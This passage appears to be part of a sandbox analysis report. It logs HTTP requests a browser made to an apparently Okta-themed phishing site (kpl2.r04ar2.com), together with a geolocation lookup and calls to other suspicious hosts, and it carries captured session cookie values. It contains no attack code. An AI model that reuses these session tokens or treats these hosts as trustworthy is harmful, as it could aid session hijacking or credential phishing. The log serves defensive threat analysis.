      Source: global trafficHTTP traffic detected: GET /klzLXAGm0iHdZcT6MtYiHXXpKNbL5RnuklNxCudj1JkeYERYfD8sQ8Od4hrM5uv220 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ijnd8sg6QezUuY8NkwAQx6Mva2UqiWIRuKitmhbhPvV0dW8953IaxnO5zyk4DAWXKxNh96jT7SddDXEWlab230 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wxHVaG32Jkcs0chiqe2Yu17gtGastmDvkLvL2DuF334122 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opKLYDT4iSj1EzadhEhDpI1lluB1YhaGl3mnNYoW0cvfRvYM2rnq8TyFW67136 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /yzv6APvxjrgntZxQ45HdaVBv4bb9NWKLthursnlZg6hH9j5QVqA9pJa5M90173 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ij377WZrFm7O0tKWNzYEiyzXpPX0VqNgscNBwZI56164 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mnYZrvj92fDlYVB6kIIxHwk2kldgIYDnxxWUlq6qF78141 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /opiCvib1OfbhHAtLAPQFkZJXG9XLLMrDTuv80Ycdhp7wkulvQ9LZaUjk5Jb8fief193 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /staE25xquFIms1ubbV5xl8DLBnj3Wsk45GqF2Do244R3qvQUFMkQXp58H3Gfgh260 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://kpl2.r04ar2.com/DSJKBRRSHVQKQNAYPHULNIARMPWNRQ72apgg8emy45ecxep2ox1c2zsodu5g?xltqgngmggtbsusyffglroeuadacufhsz3353779624593154474507208783787GEQB3HVF5MU7QFRI5NQBGGHV97QLOLQWAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /srsldqgbwnlyknaiuilfjcyqoKGYnePGFJAVJGZCNGFCUJYLNOCYUZRFYFVSVVQBpqvHhnoPyzuWRNahuv40 HTTP/1.1Host: nse.idwp.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /opGHJkGaKvnTmNyFMzfZnzJcWrEqLJbZTjGMiH6wVdpvwstZXuhyaUJEfnge69Z5HGqTwYsoleWcuQeXcd239 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhvR0UvcTR1aC8xcE94L2JQc2J2cEE9PSIsInZhbHVlIjoicFBBVEdFVW55Q2ZJSXVvYW1yVmRHa0c4cHFVOHFRTG91WXhLU0hudjJydzhrdHBlOWx6NzZuVlpUcEYvaC9McGM1eElHckpOZVhYUHVYVXZVd2RtTVJBWTBieG5rczhRT01lUkVjQTBab2MvRkRXbTdxOWhNYUJJZ21MVmcxSjYiLCJtYWMiOiI3ZTE3OGRmMzY2YmJiNTExZGY4MzhmNjM0N2NhMTg4MTNlNDQ3NTg5OThhMjI4MTk3MzMxNmVkNzM2YmJjNjlhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFzbklhcGVmMGkrMk5HY1J1ak1kWEE9PSIsInZhbHVlIjoid2E5LzVESVU3dmdwcGNpM3ZHZEhlUFBIOUZKbjBWZURwOGNKVmJJQXBwbUNaSnUyZHZucEE5VVQ2UlI4bGwrODdDNEZOaHZDTUk3NUQxRE1nK2tkVjRURk1ZL0F3U1Q1N3hSY0g1YUViZFBSZVhvc0xmOUNsb1dGNG1hdnQ2ejIiLCJtYWMiOiJmMjNjODI5N2YwMzVlMzQ1Mjg2ZGNlOGQ4ZjYzNTFjNTZiZjU3YjNlZmQzOTkwMGVkMGNjOTI4ZDlmYTUwMmQ5IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /ghNzQHRb9jvqvVbqkpfSFV6klWOhd48QqGY5YO1FOv4o4ZFC6Ief204 HTTP/1.1Host: kpl2.r04ar2.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 